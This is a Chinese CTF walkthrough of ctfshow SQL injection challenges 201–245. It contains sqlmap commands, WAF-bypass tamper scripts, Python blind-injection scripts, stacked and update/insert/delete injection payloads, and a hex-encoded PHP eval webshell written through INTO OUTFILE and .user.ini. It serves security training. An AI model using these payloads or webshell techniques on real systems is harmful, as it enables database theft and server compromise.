ctfshow web入门 sql注入(超详解)201-250

web201

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";

返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

需要学会:

 使用--user-agent 指定agent
 --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
 使用--referer 绕过referer检查
 --referer="ctf.show"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1OhhOgFI-1629680249997)(http://images2.5666888.xyz//image-20210806161457844.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2o6lYYZO-1629680250003)(http://images2.5666888.xyz//image-20210806161954869.png)]

web202——post方法

使用–data 调整sqlmap的请求方式,主要针对post传参,也可以先burp抓包用-r a.txt来实现sqlmap

--data="id=1"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hM6PHeqd-1629680250005)(http://images2.5666888.xyz//image-20210806184447194.png)]

web203——put方法

使用--method 调整sqlmap的请求方式

--method="xxx"
强制使用给定的HTTP方法(例如:PUT)

使用--method="PUT"时,需要加上
--headers="Content-Type: text/plain"
否则是按表单提交的,put接收不到

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yLGXx1nl-1629680250006)(http://images2.5666888.xyz//image-20210807203607411.png)]

web204

 使用--cookie 提交cookie数据
 --cookie="xx=xx"

ctfshow web入门 sql注入(超详解)201-250_第1张图片

web205

提示:api调用需要鉴权

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NRwMGFeg-1629680250008)(http://images2.5666888.xyz//image-20210807220923417.png)]

也就是因为这个的原因,所以需要设置--safe-url和--safe-freq,因为抓包发现,每次访问index.php前都会先访问getToken.php才能行

--safe-url 设置在测试目标地址前访问的安全链接
--safe-freq 设置两次注入测试前访问安全链接的次数

ctfshow web入门 sql注入(超详解)201-250_第2张图片

web206

sql需要闭合

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";

sqlmap能自动进行闭合操作

python sqlmap.py -u http://.challenge.ctf.show:8080/api/index.php --referer="ctf.show" --data="id=1" --method=PUT --headers="Content-Type: text/plain" --safe-url=http://.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 -D "ctfshow_web" -T ctfshow_flaxc -C flagv --dump

web207——sqlmap中tamper的使用

返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   return preg_match('/ /', $str);
  }

使用tamper脚本修改注入数据:
sqlmap -u "xxx" --tamper '脚本名'

常见的tamper有:

apostrophemask.py 	用utf8代替引号

equaltolike.py 		MSSQL * SQLite中like 代替等号

greatest.py 		MySQL中绕过过滤’>’ ,用GREATEST替换大于号

space2hash.py 		空格替换为#号 随机字符串 以及换行符

space2comment.py	用/**/代替空格

apostrophenullencode.py 	MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号

halfversionedmorekeywords.py 	当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

space2morehash.py 	 MySQL中空格替换为 #号 以及更多随机字符串 换行符

appendnullbyte.p 	 Microsoft Access在有效负荷结束位置加载零字节字符编码

ifnull2ifisnull.py 	 MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤

space2mssqlblank.py  mssql空格替换为其它空符号

base64encode.py 	 用base64编码

space2mssqlhash.py mssql查询中替换空格

modsecurityversioned.py	 mysql中过滤空格,包含完整的查询版本注释

space2mysqlblank.py	  mysql中空格替换其它空白符号

between.py 	 		MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替换大于号(>)

space2mysqldash.py 	 MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

multiplespaces.py 	 围绕SQL关键字添加多个空格

space2plus.py 	  	 用+替换空格

bluecoat.py 	 	 MySQL 5.1, SGOS代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

nonrecursivereplacement.py 	 双重查询语句。取代predefined SQL关键字with表示 suitable for替代

space2randomblank.py 	 代替空格字符(“”)从一个随机的空白字符可选字符的有效集

sp_password.py 	 	 追加sp_password’从DBMS日志的自动模糊处理的26 有效载荷的末尾

chardoubleencode.py 	 双url编码(不处理以编码的)

unionalltounion.py 	 	 替换UNION ALL SELECT UNION SELECT

charencode.py 	 	 Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;

randomcase.py 	 	 Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写

unmagicquotes.py 	 宽字符绕过 GPC addslashes

randomcomments.py 	 用/**/分割sql关键字

charunicodeencode.py 	 ASP,ASP.NET中字符串 unicode 编码

securesphere.py 	  追加特制的字符串

versionedmorekeywords.py 	     MySQL >= 5.1.13注释绕过

halfversionedmorekeywords.py 	 MySQL < 5.1中关键字前加注释

这里使用space2comment这个脚本,用/**/代替空格

python sqlmap.py -u "http://c58a3bf4-e4a3-491c-b0ac-f51d484f077f.challenge.ctf.show:8080/api/index.php" --referer="ctf.show" --data="id=1" --cookie="PHPSESSID=vv1lcq36ru3v3hnu9qsk4mllub" --method="PUT" -headers="Content-Type:text/plain" --safe-url="http://c58a3bf4-e4a3-491c-b0ac-f51d484f077f.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1 --tamper=space2comment.py --dump

web208

//对传入的参数进行了过滤
// $id = str_replace('select', '', $id);
  function waf($str){
   return preg_match('/ /', $str);
  }   

过滤关键词,可以大小写绕过,用到randomcase.py,同时space2comment.py也得用上--tamper=randomcase.py,space2comment.py

web209

ctfshow web入门 sql注入(超详解)201-250_第3张图片

这里是利用的/**/来代替的空格,但是此题被waf挡住了,我们换%0a,%09都可以--tamper="tamper/space2comment.py"

然后针对=的过滤,需要添加以下内容:

elif payload[i] == '=':
                retVal += chr(0x0d)+'like'+chr(0x0d)
                continue

web210-212

返回逻辑

//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

对你输入的id有解密处理,所以需要自行加密,同时对返回值过滤空格*号,需要用%09来代替即可

--tamper=web212即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9JZm10jc-1629680250009)(http://images2.5666888.xyz//image-20210812221751652.png)]

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW


def tamper(payload, **kwargs):
    payload = space2comment(payload)
    retVal = ""
    if payload:
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal

def space2comment(payload):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == "*":
                retVal += chr(0x31)
                continue

            elif payload[i] == "=":
                retVal += chr(0x0a)+'like'+chr(0x0a)
                continue

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]

    return retVal

web213——os-shell

练习使用--os-shell 一键getshell

//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

原理大致是:
用into outfile函数将一个可以用来上传的php文件写到网站的根目录下,之后再上传一个文件,这个文件可以用来执行系统命令,并且将结果返回出来

os-shell的使用条件
(1)网站必须是root权限
(2)攻击者需要知道网站的绝对路径
(3)GPC为off,php主动转义的功能关闭

web214

有两个post注入点:ip&debug

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/8/13 20:01
# @Function:
import requests

url = "http://42ef38fd-35c5-4cb5-ae0a-658cbd6d58e2.challenge.ctf.show:8080/api/"

flag = ""
i = 0
while True:
    i += 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查库名
        payload = "database()"
        # 查表名字
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字-id.flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        # 查数据
        # payload = "select flaga from ctfshow_flagx"
        data = {
            'ip': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1)",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        flag += chr(head)
    else:
        break
    print(flag)

web215

闭合单引号即可:

data = {            'ip': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1) and '1'='1",            'debug':'0'        }

web216

查询语句

       where id = from_base64($id);

需要闭合

data = {            'ip': f"'MQ==') or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1",            'debug':'0'        }

最终格式

where id = from_base64(1) or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1.5),1);

web217

关于benchmark函数,他会造成一个简单的时间延迟,同时网上还流传利用benchmark函数进行ddos攻击,是想让数据库超负荷,也算是比较新鲜的一个函数,比较好理解

MySQL中benchmark_MYSQL中BENCHMARK函数的利用

关键语句

data = {            'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmark(100000,md5(1)),1",            'debug':'0'        }

web218

MySQL时间盲注五种延时方法

 笛卡尔积(多表联合查询)(因为连接表是一个很耗时的操作)     AxB=A和B中每个元素的组合所组成的集合,就是连接表     SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;     select * from table_name A, table_name B     select * from table_name A, table_name B,table_name C     select count(*) from table_name A, table_name B,table_name C  表可以是同一张表

重点在很耗时,所以说可以利用这一点特性,将多表联合查询放在原来sleep的位置,就可以同样有睡眠的效果

脚本

import requests
import sys
import time
url="http://6b39c9d3-3c24-432b-abfd-735534f0e5cf.challenge.ctf.show:8080/api/"
letter="0123456789abcdefghijklmnopqrstuvwxyz-,{_}" #最后跑flag时去掉"_"
flag=""
for i in range(100):
    for j in letter:
        
        #payload="1) or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0)-- -".format(flag+j)
        #payload="1) or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc') like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0) -- +".format(flag+j)
        payload="1) or if((select group_concat(flagaac) from ctfshow_flagxc) like '{}%',(select count(*) from information_schema.columns A, information_schema.columns B),0)-- -".format(flag+j)
        data={     
            'ip':payload,
            'debug':0
        }

        #print(res)
        try:
            res = requests.post(url=url,data=data,timeout=0.15).text
        except:
            flag+=j
            print(flag) 
            break      
        if "}" == j:
            sys.exit()
        time.sleep(0.2) #遍历letter中一个字符就停止0.2s      
    time.sleep(0.2)     #正确匹配到一个字符就停止1s

web219-web220

import requests
import sys
import time
url="/api/index.php"
letter="0123456789abcdefghijklmnopqrstuvwxyz-,{}" #最后跑flag时去掉"_"
flag="ctfshow{45835205-bd93-40ff-9d71-"
for i in range(14,100):
    for j in letter:        
        #payload="1) or if((table_name from information_schema.tables where table_schema=database() limit 0,1) like '{}%',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1)-- -".format(flag+j)
        #payload="1) or if((select column_name from information_schema.columns where table_name='ctfshow_flagxcac') like '{}%',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),0) -- +".format(flag+j)
        payload="1) or if((select flagaabcc from ctfshow_flagxcac) like '{}%',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),1)-- -".format(flag+j)
        data={     
            'ip':payload, 
            'debug':0
        }
        #print(payload)
        
        try:
            res = requests.post(url=url,data=data,timeout=0.15).text
        except:
            flag+=j
            print(flag) 
            break      
        if "}" == j:
            sys.exit()
        #print(res)
        time.sleep(0.3) #遍历letter中一个字符就停止1s      
    time.sleep(0.3)     #正确匹配到一个字符就停止1s

web221——Limit注入

Mysql 注入之 limit 注入

查询语句

  //分页查询
  $sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;

返回逻辑

//TODO:很安全,不需要过滤
//拿到数据库名字就算你赢

按照链接的做法:

extractvalue(目标xml文档,xml路径):对XML文档进行查询的函数
?page=1&limit=7 procedure analyse(extractvalue(1,concat(666,database(),666)),1)

updatexml(目标xml文档,xml路径,更新的内容):更新xml文档的函数
?page=1&limit=7 procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1)

web222——group by 注入

查询语句

  //分页查询  $sql = select * from ctfshow_user group by $username;

floor()报错注入

CTF-sql-group by报错注入

y4的脚本

"""Author:Y4tacker"""import requestsurl = "http://6119f221-08cd-4363-88d4-1809bd590024.chall.ctf.show/api/"result = ""i = 0while True:    i = i + 1    head = 32    tail = 127    while head < tail:        mid = (head + tail) >> 1        # 查数据库        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"        # 查列名字        # payload = "select column_name from information_schema.columns where table_name='ctfshow_flaga' limit 1,1"        # 查数据---不能一次查完越到后面越不准确        payload = "select flagaabc from ctfshow_flaga"        # flag{b747hfb7-P8e8-        params = {            'u': f"concat((if (ascii(substr(({payload}),{i},1))>{mid}, sleep(0.05), 2)), 1);"        }        try:            r = requests.get(url, params=params, timeout=1)            tail = mid        except Exception as e:            head = mid + 1    if head != 32:        result += chr(head)    else:        break    print(result)

此处用sleep代替了floor

web223

查询语句

  //分页查询  $sql = select * from ctfshow_user group by $username;

返回逻辑

//TODO:很安全,不需要过滤//用户名不能是数字

利用原理

?u=if('a'='a',username,'a')?u=if('a'='b',username,'a')

脚本

import requests


def generateNum(num):
    res = 'true'
    if num == 1:
        return res
    else:
        for i in range(num - 1):
            res += "+true"
        return res


url = "http://ff765902-0dec-4688-8cd2-1a4cc429d30a.chall.ctf.show/api/"
i = 0
res = ""
while 1:
    head = 32
    tail = 127
    i = i + 1

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库-ctfshow_flagas
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段-flagasabc
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
        # 查flag
        payload = "select flagasabc from ctfshow_flagas"
        params = {
            "u": f"if(ascii(substr(({payload}),{generateNum(i)},{generateNum(1)}))>{generateNum(mid)},username,'a')"
        }
        r = requests.get(url, params=params)
        # print(r.json()['data'])
        if "userAUTO" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        res += chr(head)
    else:
        break
    print(res)

主要通过生成数字的函数,就原有的脚本进行了数字编码

web224

/robots.txt:

User-agent: *
Disallow: /pwdreset.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-44pjIwkR-1629680250010)(http://images2.5666888.xyz//image-20210816173211309.png)]

登陆后是文件上传,经过测试任何文件都无法上传

你没见过的注入经过这篇文章介绍,应该是需要修改文件的comments是我用的群里面的payload.bin文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Rl1kr6u3-1629680250011)(http://images2.5666888.xyz//image-20210816183907366.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cJXZso93-1629680250012)(http://images2.5666888.xyz//image-20210816184141602.png)]

这里的16进制为一句话木马,很有可能是原来的语句中,有一个解析comment的环节,正好到了这个环节也就中招了,括号被闭合,木马成功写入

getshell后读取upload.php


	error_reporting(0);
	if ($_FILES["file"]["error"] > 0)
	{
		die("Return Code: " . $_FILES["file"]["error"] . "
"
); } if($_FILES["file"]["size"]>10*1024){ die("文件过大: " .($_FILES["file"]["size"] / 1024) . " Kb
"
); } if (file_exists("upload/" . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists. "; } else { $filename = md5(md5(rand(1,10000))).".zip"; $filetype = (new finfo)->file($_FILES['file']['tmp_name']); if(preg_match("/image|png|bmap|jpg|jpeg|application|text|audio|video/i",$filetype)){ die("file type error"); } $filepath = "upload/".$filename; $sql = "INSERT INTO file(filename,filepath,filetype) VALUES ('".$filename."','".$filepath."','".$filetype."');"; move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename); $con = mysqli_connect("localhost","root","root","ctf"); if (!$con) { die('Could not connect: ' . mysqli_error()); } if (mysqli_multi_query($con, $sql)) { header("location:filelist.php"); } else { echo "Error: " . $sql . "
"
. mysqli_error($con); } mysqli_close($con); } ?>

印证猜想,其中关键在filetype的解析环节导致了comment里面的内容被读取并写入,这在给出的文章中也有提到,相信仔细看的人都会发现:是因为finfo的缘故

web225——Handler、预处理

必看链接

查询语句

  //分页查询
  $sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

返回逻辑

  //师傅说过滤的越多越好
  if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
    die(json_encode($ret));
  }

方法一——Handler

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。

/api/?username=';show tables;-- -

/api/?username=';handler `ctfshow_flagasa` open;handler `ctfshow_flagasa` read first;-- -

HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭

方法二——预处理

标准格式

PREPARE name from '[my sql sequece]';   //预定义SQL语句
EXECUTE name;  //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name;  //删除预定义SQL        语句

我的格式

PREPARE yn8rt from concat('selec','t * from ctfshow_flagasa');
EXECUTE yn8rt;
DROP PREPARE yn8rt;

concat(char(115,101,108,101,99,116)也可以代替select

web226——预处理配合16进制

返回逻辑

  //师傅说过滤的越多越好
  if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
    die(json_encode($ret));
  }

来个在线转换地址

PREPARE yn8rt from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;EXECUTE yn8rt;DROP PREPARE yn8rt;

直接拿到flag,但是不知道为什么select database()却得不到数据库名字

web227——information_schema.routines查看存储过程和函数

返回逻辑

  //师傅说过滤的越多越好  if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|db|\,/i',$username)){    die(json_encode($ret));  }

考点:

MySQL——查看存储过程和函数
mysql存储过程和函数总结

表中没有写入flag,而是把flag写在了储存过程和函数中在 MySQL 中,存储过程和函数的信息存储在 information_schema 数据库下的 Routines 表中查询语法:SELECT * FROM information_schema.Routines WHERE ROUTINE_NAME = ’ sp_name ’ ;其中,ROUTINE_NAME 字段中存储的是存储过程和函数的名称; sp_name 参数表示存储过程或函数的名称。

依然利用预处理进行解题:

PREPARE yn8rt from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;
EXECUTE yn8rt;
DROP PREPARE yn8rt;

记得闭合前面的单引号,在得知函数名为getFlag后继续精确操作:

information_schema 数据库中的 Routines 表中,存储了所有存储过程和函数的定义。使用 SELECT 语句查询 Routines 表中的存储过程和函数的定义时,一定要使用 ROUTNE_NAME 字段指定存储过程或函数的名称。否则,将查询出所有的存储过程或函数的定义。如果存储过程和存储函数名称相同,则需要要同时指定 ROUTINE_TYPE 字段表明查询的是哪种类型的存储程序。

?username=user1';PREPARE yn8rt from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e657320776865726520726f7574696e655f6e616d65203d2027676574466c616727;EXECUTE yn8rt;

16进制解码:select * from information_schema.routines where routine_name = 'getFlag'

原来这里还可以藏flag

web228、229、230

与web226一样,还没开始今天的任务就结束了,爽啊!

web231——update

查询语句

 //分页查询
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

这个题目很是巧妙,首先这是一条更新数据的语句,而并非查询语句,所以最终的目的是更新,而不是查询,所以结果是不会直接显现出来的,而是需要我们利用子查询,将结果更新到可见的表中,然后直接观测即可

payload:

//查库名、闭合引号
password=1',username=database()#&username=1

返回初始页面会发现用户名全都变成了ctfshow_web,也就是说更新成功了,紧接着我们就可以利用这个来找flag了

//查表明
password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#&username=1
//banlist,ctfshow_user,flaga

//查列名
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=1
//id,flagas,info

//查flag
password=1',username=(select flagas from ctfshow_web.flaga) where 1=1#&username=1

web232

查询语句

  //分页查询
  $sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";

同web231

只不过多了md5处理参数

payload:

//查库名、闭合引号
password=1'),username=database()#&username=1
//查flag
password=1'),username=(select flagass from ctfshow_web.flagaa) where 1=1#&username=1

需要闭合md5函数的右括号即可

web233

查询语句

  //分页查询
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

盲注

# -*- coding: utf-8 -*-# @Author  : Yn8rt# @Time    : 2021/8/18 15:32# @Function:import requestsimport timeurl = 'http://2fbf0abc-142a-43e2-abe1-c5bdebbd0823.challenge.ctf.show:8080/api/'flag = ""i = 0while 1:    i = i + 1    head = 32    tail = 127    while head < tail:        mid = (head + tail) >> 1        # 查库名        payload = "database()"        # 查数据        payload = "select flagass233 from flag233333"        data = {            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),0)#",            'password': 'y'        }        try:            r = requests.post(url=url, data=data, timeout=2.1)            tail = mid        except Exception as e:            head = mid + 1        time.sleep(1)# 每生成一个新的mid来比较时睡1s    if head != 32:        flag += chr(head)    else:        break    time.sleep(1)# flag每被赋值一次时睡1s    print(flag)

通过这个题目发现一个问题,启的docker可以被睡死,然后睡醒了才能复活

web234——反斜杠\转义引号

查询语句

  //分页查询
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

返回逻辑

  //无过滤

因为单引号被过滤了,当存在单引号,和没有单引号的时候返回值是不一样的,所以需要用反斜杠转义来逃逸,然后注入点改为username,因为前面的where已经被当做字符串了失去了原来的作用,这样才会保证set成功

payload:

password=1\&username=,username=(select database())#

password=1\&username=,username=(select group_concat(table_name) from information_schema.tables where table_schema=database())#
//flag23a

password=1\&username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)#
//id,flagass23s3,info

password=1\&username=,username=(select flagass23s3 from flag23a)#

web235、236——Bypass information_schema与无列名注入

概述MySQL统计信息

CTF|mysql之无列名注入

这么个意思呢。

就是利用

innodb_table_stats代替information_schema

mysql默认存储引擎innoDB携带的表:
mysql.innodb_table_stats
mysql.innodb_index_stats

两表均有database_name和table_name字段
ctfshow web入门 sql注入(超详解)201-250_第4张图片

查询语句

  //分页查询
  $sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

返回逻辑

  //过滤 or ' 

payload:

password=1\&username=,username=(select database())#

password=1\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#
//banlist,ctfshow_user,flag23a1

非常一定要看:Bypass information_schema与无列名注入

接下来需要无列名注入

payload:

password=1\&username=,username=(select group_concat(`2`) from(select 1,2,3 union select * from flag23a1)a)#

web237——INSERT注入

查询语句

//插入数据  $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

闭合!

username=yn8rt',database());#&password=1username=yn8rt',(select group_concat(table_name) from information_schema.tables where table_schema=database()));#&password=1username=yn8rt',(select group_concat(column_name) from information_schema.columns where table_name='flag'));#&password=1username=yn8rt',(select group_concat(flagass23s3) from flag));#&password=1

web238——INSERT注入

()代替空格

username=yn8rt',(select(database())));#&password=1

username=yn8rt',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#&password=1

username=yn8rt',(select(group_concat(table_column))from(information_schema.columns)where(table_name='flagb')));#&password=1

username=yn8rt',(select(group_concat(flag))from(flagb)));#&password=1

web239——INSERT注入

information表被过滤了,按照之前的做法用mysql.innodb_table_stats

首先查表
username=1',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())))#&password=1

然后盲猜:

username=yn8rt',(select(group_concat(flag))from(flagbb);#

web240

Hint: 表名共9位,flag开头,后五位由a/b组成,如flagabaab,全小写

查询语句

  //插入数据
  $sql = "insert into ctfshow_user(username,pass) value('{$username}','{$password}');";

返回逻辑

  //过滤空格 or sys mysql

python脚本

import requests
kk="ab"
url1="http://a1f0a0b5-fd70-4ca6-a9f2-2d6b60565ed6.challenge.ctf.show:8080/api/insert.php"
url2="http://a1f0a0b5-fd70-4ca6-a9f2-2d6b60565ed6.challenge.ctf.show:8080/api/?page=1&limit=100"
for i in kk:
    for j in kk:
        for m in kk:
            for n in kk:
                for c in kk:
                    flag="flag"+i+j+m+n+c
                    print(flag)
                    data={     
                    'username':"yn8rt',(select(group_concat(flag))from({})));#".format(flag),
                    'password':1
                    }
                    res=requests.post(url=url1,data=data).text
                    
                    r=requests.get(url=url2).text
                    print(r)
                    if "ctfshow{" in r:
                        print(res)
                        exit()

web241——DELETE注入

sql语句

  //删除记录
  $sql = "delete from  ctfshow_user where id = {$id}";

python脚本

# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/8/20 13:04
# @Function:
import requests
import time

url = 'http://060c1957-6988-495b-82a7-bd24f6611427.challenge.ctf.show:8080/api/delete.php'
flag = ''
i = 4

while 1:
    i += 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # 查库名
        # payload = 'database()'
        # 查表名
        # payload = '(select group_concat(table_name) from information_schema.tables where table_schema=database())'
        # 查列名
        # payload = "(select group_concat(column_name) from information_schema.columns where table_name='flag')"
        # 查flag
        payload = '(select flag from flag)'
        data = {
            'id':f"if(ascii(substr({payload},{i},1))>{mid},sleep(0.1),0)#"
        }

        try:
            r = requests.post(url=url,data=data,timeout=2.1)
            tail = mid
        except Exception as e:
            head = mid + 1
        time.sleep(1)
    if head != 32:
        flag += chr(head)
    else:
        break
    time.sleep(1)
    print(flag)

web242——file文件读写

sql语句

  //备份表
  $sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

利用info outfile的扩展参数来做题

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]
“OPTION”参数为可选参数选项,其可能的取值有:

`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。

可以写马的参数有:

FIELDS TERMINATED BYLINES STARTING BYLINES TERMINATED BY

在url/api/dump.php下写马

马在url/dump/1.php

filename=1.php' LINES STARTING BY "";#

命令行到根目录输入

find / -name "f*" | xargs grep "ctfshow"

web243

sql语句

  //备份表
  $sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

返回逻辑

  //过滤了php

在上一题目的payload中是需要php字段的,这里给取消掉了,也不知道phtml好不好用,但是本地重要考点在于.user.ini:auto_append_file=1.png或者auto_prepend_file=1.png

再熟悉一遍上一题的参数:

FIELDS TERMINATED BY:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。

LINES STARTING BY '字符串':设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

LINES TERMINATED BY '字符串':设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。

payload:

先上ini:

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e706e670a;#

注意16进制是为了0a(换行)发挥作用,而starting by “;”,是想让每行数据的开头字符都是分号,是为了让前面的那个select * from ctfshow_user查出来的东西与后面的做个了断

再上png:

filename=1.png' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b315d293b3f3e;#

连接时候注意是/dump/index.php

ctfshow web入门 sql注入(超详解)201-250_第5张图片

web244、245——报错注入

sql语句

  //备份表
  $sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";

报错注入的两种形式:

extractvalue(目标xml文档,xml路径):对XML文档进行查询的函数


updatexml(目标xml文档,xml路径,更新的内容):更新xml文档的函数

其都是针对xml路径进行的注入

payload:

updatexml:
?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,substr((select group_concat(flag) from ctfshow_flag),1,32),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,(select left(flag,32) from ctfshow_flag),0x7e),1)+--+

